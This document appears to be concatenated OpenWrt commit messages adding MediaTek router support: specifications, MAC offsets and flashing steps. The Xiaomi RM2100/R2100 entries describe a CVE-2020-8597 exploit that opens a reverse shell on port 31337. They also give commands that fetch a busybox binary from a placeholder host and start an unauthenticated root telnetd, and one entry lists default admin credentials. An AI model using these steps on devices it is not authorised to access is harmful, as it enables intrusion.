This adds support for the Netgear R6020, aka Netgear AC750.
The R6020 appears to be the same hardware as the Netgear R6080,
aka Netgear AC1000, but it has a slightly different flash layout,
and no USB ports.
Specification:
SoC: MediaTek MT7628 (580 MHz)
Flash: 8 MiB
RAM: 64 MiB
Wireless: 2.4Ghz (builtin) and 5Ghz (MT7612E)
LAN speed: 10/100
LAN ports: 4
WAN speed: 10/100
WAN ports: 1
UART (57600 8N1) on PCB
MAC addresses based on vendor firmware:
LAN *:88 0x4
WAN *:89
WLAN2 *:88 0x4
WLAN5 *:8a 0x8004
The factory partition might have been corrupted beforehand. However,
the comparison of vendor firmware and OpenWrt still allowed to retrieve
a meaningful assignment that also matches the other similar devices.
Installation:
Flashing OpenWRT from stock firmware requires nmrpflash. Use an ethernet
cable to connect to LAN port 1 of the R6020, and power the R6020 off.
From the connected workstation, run
`nmrpflash -i eth0 -f openwrt-ramips-mt76x8-netgear_r6020-squashfs-factory.img`,
replacing eth0 with the appropriate interface (can be identified by
running `nmrpflash -L`). Then power on the R6020. After flashing has finished,
power cycle the R6020, and it will boot into OpenWRT. Once OpenWRT has been
installed, subsequent flashes can use the web interface and sysupgrade files.
Signed-off-by: Tim Thorpe <timfthorpe@gmail.com>
[slightly extend commit message, fix whitespaces in DTS, align From:
with Signed-off-by]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The rg21s fails to boot if the kernel is larger than about
2,376 KiB. The ra21s is virtually identical hardware.
Enabling lzma-loader resolves the issue on both the rg21s
and ra21s (see FS#3057 on the issue tracker).
Fixes: FS#3057
Signed-off-by: Furkan Alaca <furkan.alaca@queensu.ca>
Device specification:
SoC: RT5350
CPU Frequency: 360 MHz
Flash Chip: Macronix MX25L6406E (8192 KiB)
RAM: Winbond W9825G6JH-6 (32768 KiB)
5x 10/100 Mbps Ethernet (4x LAN, 1x WAN)
1x external antenna
UART (J1) header on PCB (57800 8n1)
Wireless: SoC-intergated: 2.4GHz 802.11bgn
USB: None
8x LED, 2x button
Flash instruction:
Configure PC with static IP 192.168.99.8/24 and start TFTP server.
Rename "openwrt-ramips-rt305x-zyxel_keenetic-lite-b-squashfs-sysupgrade.bin"
to "rt305x_firmware.bin" and place it in TFTP server directory.
Connect PC with one of LAN ports, press the reset button, power up
the router and keep button pressed until power LED start blinking.
Router will download file from TFTP server, write it to flash and reboot.
Signed-off-by: Sergei Burakov <senior.anonymous@ya.ru>
Adding this has been overlooked when rebasing the commit prior to
merge.
Fixes: ba0f4f0cfd ("ramips: add support for TP-Link RE500 v1")
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Hardware
--------
SoC: MediaTek MT7621ST
WiFi: MediaTek MT7603
Quantenna QT3840BC
Flash: 128M NAND
RAM: 64M
LED: Dual colour red and green
BTN: Reset
WPS
Eth: 4 x 10/100/1000 connected to MT7621 internal switch
MT7621 RGMII port connected to Quantenna module
GPIO: Power/reset of Quantenna module
Quantenna module
----------------
The Quantenna QT3840BC (or QV840) is a separate SoC running
another Linux installation. It is mounted on a wide mini-PCIe
form factor module, but is connected to the RGMII port of
the MT7621. It loads both a second uboot stage and an os
image from the MT7621 using tftp. The module is configured
using Quantenna specific RPC calls over IP, using 802.1q
over the RGMII link to support multiple SSIDs.
There is no support for using this module as a WiFi device
in OpenWrt. A package with basic firmware and management
tools is being prepared.
Serial ports
------------
Two serial ports with headers:
RRJ1 - 115200 8N1 - Connected to the Quantenna console
J1 - 57600 8N1 - Connected to the MT7621 console
Both share pinout with many other Zyxel/Mitrastar devices:
1 - NC (VDD)
2 - TX
3 - RX
4 - NC (no pin)
5 - GND
Dual system partitions
----------------------
The vendor firmware and boot loader use a dual partition
scheme storing a counter in the header of each partition. The
partition with the highest number will be selected for boot.
OpenWrt does not support this scheme and will always use the
first OS partition. It will reset both counters to zero the
first time sysupgrade is run, making sure the first partition
is selected by the boot loader.
Installation from vendor firmware
---------------------------------
1. Run a DHCP server. The WAP6805 is configured as a client device
and does not have a default static IP address. Make a note of
which address it is assigned
2. tftp the OpenWrt initramfs-kernel.bin image to this address.
Wait for the WAP6805 to reboot.
3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a
backup of all mtd partitions now. The last used OEM image is
still present in either "Kernel" or "Kernel2" at this point,
and can be restored later if you save a copy.
4. sysupgrade to the OpenWrt sysupgrade.bin image.
Installation from U-Boot
------------------------
This requires serial console access
1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to
your tftp server directory. Configure the server address as
192.168.0.33/24
2. Hit ESC when the message "Hit ESC key to stop autoboot"
appears
3. Type "ATGU" + Enter, and then "2" immediately after pressing enter.
4. Answer Y to the question "Erase Linux in Flash then burn new
one. Are you sure?", and answer the address/filename questions.
Defaults:
Input device IP (192.168.0.2)
Input server IP (192.168.0.33)
Input Linux Kernel filename ("ras.bin")
5. Wait until after you see the message "Done!" and power cycle
the device. It will hang after flashing.
6. Continue with step 3 and 4 from the vendor firmware procedure.
Notes on the WAP6805 U-Boot
---------------------------
The bootloader has been modified with both ZyXELs zyloader and the
device specific dual partition scheme. These changes appear to have
broken a few things. The zyloader shell claims to support a number
of ZyXEL AT commands, but not all of them work. The image selection
scheme is unreliable and inconsistent. A limited U-Boot menu is
available - and used by the above U-Boot install procedure. But
direct booting into an uploaded image does not work, neither with
ram nor with flash. Flashing works, but requires a hard reset after
it is finished.
Reverting to OEM firmware
-------------------------
The OEM firmware can be restored by using mtd write from OpenWrt,
flashing it to the "Kernel" partition. E.g.
ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin
OEM firmwares for the WAP6805 are not avaible for public download,
so a backup of the original installation is required. See above.
Alternatively, firmware for the WAP6806 (Armor X1) may be used. This
is exactly the same hardware. But the branding features do obviously
differ.
LED controller
--------------
Hardware implementation is unknown. The dual-color LED is controlled
by 3 GPIOs:
4: red
7: blinking green
13: green
Enabling both red and green makes the LED appear yellow.
The boot loader enables hardware blinking, causing the green LED to blink
slowly on power-on, until the OpenWrt boot mode starts a faster software
blink.
Signed-off-by: Bjørn Mork <bjorn@mork.no>
[fix alphabetic sorting for image build statement]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
f3792690c4
Thanks for all community and especially for this device:
@Ilyas @scp07 @namidairo @Percy @thorsten97 @impulse (names@forum.openwrt.com)
MAC Locations:
WAN *:b5 = factory 0xe006
LAN *:b6 = factory 0xe000
WIFI 5ghz *:b8 = factory 0x8004
WIFI 2.4ghz *:b7 = factory 0x0004
Signed-off-by: Emir Efe Kucuk <emirefek@gmail.com>
[refactored common image bits into Device/xiaomi-ac2100, fixed From:]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 128MB
FLASH: 16MB NOR (Macronix MX25L12805D)
ETH: 1x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615 (4x4:4)
- 5GHz: 1x MT7615 (4x4:4)
- 4 antennas: 2 external detachable and 2 internal
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x Green led (Power)
- 1x Green-Amber-Red led (Wifi)
UART:
- 57600-8-N-1
Everything works correctly.
Installation
------------
Flash the factory image directly from OEM web interface.
(You can login using these credentials: admin/1234)
Restore OEM Firmware
--------------------
Flash the OEM "bin" firmware directly from LUCI.
The firmware is downloadable from the OEM web page.
Warning: Remember to not keep settings!
Warning2: Remember to force the flash.
Restoring procedure tested with RE23_1.08.bin
MAC addresses
-------------
factory 0x4 *:24
factory 0x8004 *:25
Cimage 0x07 *:24
Cimage 0x0D *:24
Cimage 0x13 *:24
Cimage 0x19 *:25
No other addresses were found in factory partition.
Since the label contains both the 2.4GHz and 5GHz mac address I decided
to set the 5GHz one as label-mac-device. Moreover it also corresponds
to the lan mac address.
Notes
-----
The wifi led in the OEM firmware changes colour depending on the signal
strength. This can be done in OpenWrt but just for one interface.
So for now will not be any default action for this led.
If you want to open the case, pay attention to the antenna placed on
the bottom part of the front cover.
The wire is a bit short and it breaks easily. (I broke it)
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
[fix two typos and add extended MAC address section to commit message]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This device uses the same hardware as RE650 v1 which got supported in
8c51dde.
Hardware specification:
- SoC 880 MHz - MediaTek MT7621AT
- 128 MB of DDR3 RAM
- 16 MB - Winbond 25Q128FVSG
- 4T4R 2.4 GHz - MediaTek MT7615E
- 4T4R 5 GHz - MediaTek MT7615E
- 1x 1 Gbps Ethernet - MT7621AT integrated
- 7x LEDs (Power, 2G, 5G, WPS(x2), Lan(x2))
- 4x buttons (Reset, Power, WPS, LED)
- UART header (J1) - 2:GND, 3:RX, 4:TX
Serial console @ 57600,8n1
Flash instructions:
Upload
openwrt-ramips-mt7621-tplink_re500-v1-squashfs-factory.bin
from the RE500 web interface.
TFTP recovery to stock firmware:
Unfortunately, I can't find an easy way to recover the RE
without opening the device and using modified binaries. The
TFTP upload will only work if selected from u-boot, which
means you have to open the device and attach to the serial
console. The TFTP update procedure does *not* accept the
published vendor firmware binaries. However, it allows to
flash kernel + rootfs binaries, and this works if you have
a backup of the original contents of the flash. It's probably
possible to create special image out of the vendor binaries
and use that as recovery image.
Signed-off-by: Christoph Krapp <achterin@googlemail.com>
[remove dts-v1 in DTSI, do not touch WiFi LEDs for RE650, keep
state_default in DTS files, fix label-mac-device, use lower case
for WiFi LEDs]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
TP-Link RE220 v2 is a wireless range extender with Ethernet and 2.4G and 5G
WiFi with internal antennas. It's based on MediaTek MT7628AN+MT7610EN.
This port of OpenWRT leverages work done by Andreas Böhler <dev@aboehler.at>
for the TP-Link RE200 v2 as both devices share the same SoC, flash layout
and GPIO pinout.
Specifications
MediaTek MT7628AN (580 Mhz)
64 MB of RAM
8 MB of FLASH
2T2R 2.4 GHz and 1T1R 5 GHz
1x 10/100 Mbps Ethernet
UART header on PCB (57600 8n1)
8x LED (GPIO-controlled), 2x button
There are 2.4G and 5G LEDs in red and green which are controlled separately.
Web Interface Installation
It is possible to upgrade to OpenWrt via the web interface. Simply flash
the -factory.bin from OEM. In contrast to a stock firmware, this will not
overwrite U-Boot.
Signed-off-by: Rowan Border <rowanjborder@gmail.com>
This package allows to read battery status information and control the
power state of the RAVPower RP-WD009 power management IC.
Signed-off-by: David Bauer <mail@david-bauer.net>
The RAVPower RP-WD009 is a batter-powered pocket sized router with SD
card lot and USB port.
Hardware
--------
CPU: MediaTek MT7628AN
RAM: 64M DDR2
FLASH: 16M GigaDevices SPI-NOR
WLAN: MediaTek MT7628AN 2T2R b/g/n
MediaTek MT7610E 1T1R n/ac
ETH: 1x FastEthernet
SD: SD Card slot
USB: USB 2.0
Custom PMIC on the I2C bus (address 0x0a).
Installation
------------
1. Press and hold down the reset button.
2. Power up the Device. Keep pressing the reset button for 10
more seconds until the Globe LED lights up.
3. Attach your Computer to the Ethernet port. Assign yourself the
address 10.10.10.1/24.
4. Access the recovery page at 10.10.10.128 and upload the OpenWrt
factory image.
5. The flashing will take around 1 minute. The device will reboot
automatically into OpenWrt.
Signed-off-by: David Bauer <mail@david-bauer.net>
This commit adds support for the Wavlink WL-WN577A2 (black case) dual-band
wall-plug wireless router. In Germany this device is sold under the brand
name Maginon WL-755 (white case):
Device specifications:
- CPU: MediaTek MT7628AN (580MHz)
- Flash: 8MB
- RAM: 64MB
- Bootloader: U-Boot
- Ethernet: 2x 10/100 Mbps (Ralink RT3050)
- 2.4 GHz: 802.11b/g/n SoC
- 5 GHz: 802.11a/n/ac MT7610E
- Antennas: internal
- 4 green LEDs: 1 programmable (WPS) + LAN, WAN, POWER
- Buttons: Reset, WPS
- Small sliding power switch
Flashing instructions (U-boot):
- Configure a TFTP server on your PC/Laptop and set its IP
to 192.168.10.100
- Rename the OpenWrt image to firmware.bin and place it in the
root folder of the TFTP server
- Power off (using the small sliding power switch on the left
side) the device and connect an ethernet cable from its LAN
or WAN port to your PC/Laptop
- Press the WPS button (and keep it pressed)
- Power on the device (using the small power switch)
- After a few seconds, when the WAN/LAN LED stops blinking
very fast, release the WPS button
- Flashing OpenWrt takes less than a minute, system will
reboot automatically
- After reboot the WPS LED will indicate the current OpenWrt
running status
Signed-off-by: Lars Wessels <software@bytebox.org>
[removed unused labels - fix whitespace errors - wrap commit message]
Signed-off-by: David Bauer <mail@david-bauer.net>
The WAC124 hardware appears to be identical to R6260/R6350/R6850.
SoC: MediaTek MT7621AT
RAM: 128M DDR3
FLASH: 128M NAND (Macronix MX30LF1G18AC)
WiFI: MediaTek MT7603 bgn 2T2R
MediaTek MT7615 nac 4T4R
ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN)
USB: 1x USB 2.0
BTN: Reset, WPS
LED: Power, Internet, WiFi, USB (all green)
Installation:
The factory image can be flashed from the stock firmware web interface
or using nmrpflash. With nmrpflash it is also possible to revert to
stock firmware.
Signed-off-by: Jan Hoffmann <jan@3e8.eu>
This adds support for the Netgear R6080, aka Netgear AC1000.
The R6080 has almost the same hardware as the Netgear R6120,
aka Netgear AC1200, but it lacks the USB port, has only 8 MiB flash and
uses a different SERCOMM_HWID.
Specification:
SoC: MediaTek MT7628 (580 MHz)
Flash: 8 MiB
RAM: 64 MiB
Wireless: 2.4Ghz (builtin) and 5Ghz (MT7612E)
LAN speed: 10/100
LAN ports: 4
WAN speed: 10/100
WAN ports: 1
UART (57600 8N1) on PCB
Installation:
Flashing OpenWRT from stock firmware requires nmrpflash. Use an ethernet
cable to connect to LAN port 1 of the R6080, and power the R6080 off.
From the connected workstation, run
`nmrpflash -i eth0 -f openwrt-ramips-mt76x8-netgear_r6080-squashfs-factory.img`,
replacing eth0 with the appropriate interface (can be identified by
running `nmrpflash -L`). Then power on the R6080. After flashing has finished,
power cycle the R6080, and it will boot into OpenWRT. Once OpenWRT has been
installed, subsequent flashes can use the web interface and sysupgrade files.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
[rebase and adjust for 5.4]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
This commit performs minor janitorial work to clean up some code
formatting for the Netgear R6120.
Signed-off-by: Alex Lewontin <alex.c.lewontin@gmail.com>
NETGEAR WAC104 is an AP based on castrated R6220, without WAN
port and USB.
SoC: MediaTek MT7621ST
RAM: 128M DDR3
FLASH: 128M NAND
WiFi: MediaTek MT7612EN an+ac
MediaTek MT7603EN bgn
ETH: MediaTek MT7621ST (4x LAN)
BTN: 1x Connect (WPS), 1x WLAN, 1x Reset
LED: 7x (3x GPIO controlled)
Installation:
Login to netgear webinterface and flash factory.img
Back to stock:
Use nmrpflash to revert stock image.
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
Specifications:
* SoC: MT7620A
* CPU: 580 MHz
* RAM: 64 MB DDR
* Flash: 8MB NOR SPI flash
* WiFi: MT7612E (5GHz) and builtin MT7620A (2.4GHz)
* LAN: 1x100M
The device is identical to the EX6130 except
for the mains socket and the hardware ID.
Installation:
The -factory images can be flashed from the
device's web interface or via nmrpflash.
Notes:
MAC addresses were set up based on the EX6130 setup.
This is based on prior work of Adam Serbinski and Mathias Buchwald.
Tested by Mathias Buchwald.
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
ZyXEL Keenetic has a USB port. Thus, DWC2 USB controller driver should
be in the default image for this device.
Fixes: a7cbf59e0e ("ramips: add new device ZyXEL Keenetic as kn")
Signed-off-by: Alexey Dobrovolsky <dobrovolskiy.alexey@gmail.com>
[fixed whitespace issue]
Signed-off-by: Petr Štetiar <ynezz@true.cz>
Specifications:
* MediaTek MT7620A (580 Mhz)
* 8 MB of FLASH
* 64 MB of RAM
* 2.4Ghz and 5.0Ghz radios
* 5x 10/100 Mbps Ethernet (1 WAN and 4 LAN)
* UART header on PCB (57600 8n1)
* Green/Orange Power LEDs illuminating a Power-Button Lens
* Green/Orange Internet LEDs GPIO controlled illuminating a Globe/Internet Lens
* 3x button - wps, power and reset
* U-boot bootloader
Installation:
The sysupgrade.bin image is reported to be OEM web flashed with an ncc_att_hwid
appended. ncc_att_hwid is a 32bit binary in the GPL Source download for either
the TEW-810DR or DIR-810L and is located at
source/user/wolf/cameo/ncc/hostTools.
The invocation is: ncc_att_hwid -f tew-810dr-squashfs-factory.bin -a -m "TEW-810DR" -H "1.0R" -r "WW" -c "1.0"
This may need to be altered if your hardware version is "1.1R".
The image can also be directly flashed via serial tftp:
1. Load *.sysupgrade.bin to your tftp server directory and rename for
convenience.
2. Set a static ip 192.168.10.100.
3. NIC cable to a lan port.
4. Serial connection parameters 57600,8N1
5. Power on the TEW-810 and press 4 for a u-boot command line prompt.
6. Verify IP's with U-Boot command "printenv".
7. Adjust tftp settings if needed per the tftp documentation
8. Boot the tftp image to test the build.
9. If the image loads, reset your server ip to 192.168.1.10 and restart network.
10. Log in to Luci, 192.168.1.1, and flash the *sysupgrade.bin image.
Notes:
The only valid MAC address is found in 0x28 of the factory partition.
Other typical offsets/caldata only contain example data: 00:11:22:00:0f:xx
Signed-off-by: J. Scott Heppler <shep971@centurylink.net>
[remove "link rx tx" in 01_leds, format and extend commit message,
fix DTS led node names]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specifications:
- MT7628NN @ 580 MHz
- 32 MB RAM
- 8 MB Flash
- 5x 10/100 Mbps Ethernet (built-in switch)
- 2.4 GHz WLAN
- 2x external, non-detachable antennas (1x for RT-N10P V3)
Flash instructions:
1. Set PC network interface to 192.168.1.75/24.
2. Connect PC to the router via LAN.
3. Turn router off, press and hold reset button, then turn it on.
4. Keep the button pressed till power led starts to blink.
5. Upload the firmware file via TFTP. (Any filename is accepted.)
6. Wait until the router reboots.
Signed-off-by: Ernst Spielmann <endspiel@disroot.org>
[fix node/property name for state_default]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot
Installation:
1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0
Restore to stock:
1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white
Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.
Exploit and detailed instructions:
https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
An implementation of CVE-2020-8597 against stock firmware version 1.0.14
This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.
As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.
The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh
Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
This is additional fix of c998ae7f0e.
The sysupgrade image of I-O DATA MT7621 devices manufactured by MSTC
(MitraStar Technology Corp.) faced to the booting issue. This was caused
by imcomplete extraction of large kernel image by U-Boot, and this issue
is occurred in initramfs image after fixing of sysupgrade image.
So, use lzma-loader for initramfs image to fix the issue.
Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
Co-developed-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp>
Tested-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [wn-ax2033gr]
The version inside the compat file determines, if a firmware supports
a specific device. I have not yet fully understood, how this is checked,
but it only seems to indicate which devices are supported by a specific
version of the combined vendor firmware. Devices assume that subsequent
versions, starting with the version that initially added support for a
specific device, are always compatible.
The first compat version that added support for the EP-R6 was '21001:7',
but OpenWrt did use '21001:6' before. This is why the factory image could
not be flashed using the vendor software, but only using TFTP.
The compat version has been bumped by the vendor a few times, but more
devices have been added since (e.g. ER-10X). Because OpenWrt currently
only supports the ER-X, ER-X-SFP and EP-R6, the compat version is
incremented to the version that first supported the EP-R6, which is
'21001:7'.
This allows the factory image to be flashed on EP-R6 without TFTP.
Signed-off-by: Fabian Bläse <fabian@blaese.de>
The Linksys EA7500 v2 is advertised as AC1900, but its internal
hardware is AC2600 capable.
Hardware
--------
SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads)
RAM: 256M (Nanya NT5CC128M16IP-DI)
FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI)
ETH: 5x 10/100/1000 Mbps Ethernet (MT7530)
WIFI:
- 2.4GHz: 1x MT7615N (4x4:4)
- 5GHz: 1x MT7615N (4x4:4)
- 4 antennas: 3 external detachable antennas and 1 internal
USB:
- 1x USB 3.0
- 1x USB 2.0
BTN:
- 1x Reset button
- 1x WPS button
LEDS:
- 1x White led (Power)
- 6x Green leds (link lan1-lan4, link wan, wps)
- 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable)
Everything works correctly.
Installation
------------
The “factory” openwrt image can be flashed directly from OEM stock
firmware. After the flash the router will reboot automatically.
However, due to the dual boot system, the first installation could fail
(if you want to know why, read the footnotes).
If the flash succeed and you can reach OpenWrt through the web
interface or ssh, you are done.
Otherwise the router will try to boot 3 times and then will
automatically boot the OEM firmware (don’t turn off the router.
Simply wait and try to reach the router through the web interface
every now and then, it will take few minutes).
After this, you should be back in the OEM firmware.
Now you have to flash the OEM Firmware over itself using the OEM web
interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img
downloaded from the Linksys website).
When the router reboots flash the “factory” OpenWrt image and this
time it should work.
After the OpenWrt installation you have to use the sysupgrade image
for future updates.
Restore OEM Firmware
--------------------
After the OpenWrt flash, the OEM firmware is still stored in the
second partition thanks to the dual boot system.
You can switch from OpenWrt to OEM firmware and vice-versa failing
the boot 3 times in a row:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
If you want to completely remove OpenWrt from your router, switch to
the OEM firmware and then flash OEM firmware from the web interface
as a normal update.
This procedure will overwrite the OpenWrt partition.
Footnotes
---------
The Linksys EA7500-v2 has a dual boot system to avoid bricks.
This system works using 2 pair of partitions:
1) "kernel" and "rootfs"
2) "alt_kernel" and "alt_rootfs".
After 3 failed boot attempts, the bootloader tries to boot the other
pair of partitions and so on.
This system is managed by the bootloader, which writes a bootcount in
the s_env partition, and if successfully booted, the system add a
"zero-bootcount" after the previous value.
A system update performed from OEM firmware, writes the firmware on the
other pair of partitions and sets the bootloader to boot the new pair
of partitions editing the “boot_part” variable in the bootloader vars.
Effectively it's a quick and safe system to switch the selected boot
partition.
Another way to switch the boot partition is:
1) power on the router
2) wait 15 seconds
3) power off the router
4) repeat steps 1-2-3 twice more.
5) power on the router and you should be in the “other” firmware
In this OpenWrt port, this dual boot system is partially working
because the bootloader sets the right rootfs partition in the cmdline
but unfortunately OpenWrt for ramips platform overwrites the cmdline
so is not possible to detect the right rootfs partition.
Because all of this, I preferred to simply use the first pair of
partitions and set read-only the other pair.
However this solution is not optimal because is not possible to know
without opening the case which is the current booted partition.
Let’s take for example a router booting the OEM firmware from the first
pair of partitions. If we flash the OpenWrt image, it will be written
on the second pair. In this situation the router will bootloop 3 times
and then will automatically come back to the first pair of partitions
containg the OEM firmware.
In this situation, to flash OpenWrt correctly is necessary to switch
the booting partition, flashing again the OEM firmware over itself.
At this point the OEM firmware is on both pair of partitions but the
current booted pair is the second one.
Now, flashing the OpenWrt factory image will write the firmware on
the first pair and then will boot correctly.
If this limitation in the ramips platform about the cmdline will be
fixed, the dual boot system can also be implemented in OpenWrt with
almost no effort.
Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com>
Co-Developed-by: Jackson Lim <jackcolentern@gmail.com>
Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
netis WF2770 is a 2.4/5GHz band AC750 router, based on MediaTek MT7620A.
Specifications:
- SoC: MT7620A
- RAM: DDR2 64MB
- Flash: SPI NOR 16MB
- WiFi:
- 2.4GHz: SoC internal
- 5GHz: MT7610EN
- Ethernet: 5x 10/100/1000Mbps
- Switch: MT7530BU
- UART:
- J2: 3.3V, RX, TX, GND (3.3V is the square pad) / 57600 8N1
MAC addresses in factory partition:
0x0004: LAN, WiFi 2.4GHz (label_mac-6)
0x0028: not used (label_mac-1)
0x002e: WAN (label_mac)
0x8004: WiFi 5GHz (label_mac+2)
Installation via web interface:
1. Flash **initramfs** image through the stock web interface.
2. Boot into OpenWrt and perform sysupgrade with sysupgrade image.
Revert to stock firmware:
1. Perform sysupgrade with stock image.
Reviewed-by: Pawel Dembicki <paweldembicki@gmail.com>
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
Specification:
- CPU: MTK MT7620A
- RAM: 64MB
- ROM: 16MB SPI Flash Macronix MX25L12835E
- WiFi1: MediaTek MT7620A
- WiFi2: MediaTek MT7612E
- Button: reset, wps
- LED: 9 LEDs:Power, WiFi 2.4G,WiFi 5G, USB, LAN1, LAN2, LAN3, LAN4, WAN
- Ethernet: 5 ports, 4 LAN + 1 WAN
- Other: 1x UART 1x USB2.0
Installation:
Update using ASUS Firmware Restoration Tool:
1. Download the ASUS Firmware Restoration Tool but don't open it yet
2. Unplug your computer from the router
3. Put the router into Rescue Mode by: turning the power off, using a pin
to press and hold the reset button, then turning the router back on while
keeping the reset button pressed for ~5 secs until the power LED starts
flashing slowly (which indicates the router has entered Rescue Mode)
4. Important (if you don't do this next step the Asus Firmware
Restoration Tool will wrongly assume that the router is not in Rescue Mode
and will refuse to flash it): go to the Windows Control Panel and
temporarily disable ALL other network adapters except the one you will use
to connect your computer to the router
5. For the single adapter you left enabled, temporarily give it the
static IP 192.168.1.10 and the subnet mask 255.255.255.0
6. Connect a LAN cable between your computer (make sure to use the
Ethernet port of the adapter you've just set up) and port 1 of the router
(not the router's WAN port)
7. Rename sysupgrade.bin to factory.trx
8. Open the Asus Firmware Restoration Tool, locate factory.trx and click
upload (if Windows shows a compatibility prompt, confirm that the tool worked fine)
9. Flashing and reboot is finished when the power LED stops blinking and
stays on
MAC assignment based on vendor firmware:
2g 0x4 label
5g 0x8004 label +4
lan 0x22 label +4
wan 0x28 label
Signed-off-by: Zhijun You <hujy652@gmail.com>
[rebased due to DTSI patch, minor commit message adjustments, fix
label MAC address (lan->wan), do spi frequency increase separately]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
The BL-W1200 Wireless Router is based on the MT7620A SoC.
Specification:
- MediaTek MT7620A (580 Mhz)
- 64 MB of RAM
- 8 MB of FLASH
- 1x 802.11bgn radio
- 1x 802.11ac radio (MT7612E)
- 5x 10/100/1000 Mbps Ethernet (MT7530)
- 2x external, non-detachable antennas (Wifi 2.4G/5G)
- 1x USB 2.0
- UART (R2) on PCB (57600 8n1)
- 9x LED (1 GPIO controlled), 1x button
- u-Boot bootloader
Known issues:
- No status LED. Used WPS LED during boot/failsafe/sysupgrade.
Installation:
1. Apply initramfs image via factory web-gui.
2. Install sysupgrade image.
How to revert to OEM firmware:
- sysupgrade -n -F stock_firmware.bin
Reviewed-by: Sungbo Eo <mans0n@gorani.run>
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
- use tab indent in image build recipes for consistency
- harmonize line wrapping
Signed-off-by: Sungbo Eo <mans0n@gorani.run>
[use different line wrapping for one recipe]
Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
In rt3883 subtarget, several devices add swconfig to their DEVICE_PACKAGES.
This is redundant as the package is already provided via DEFAULT_PACKAGES.
Remove the redundant inclusions.
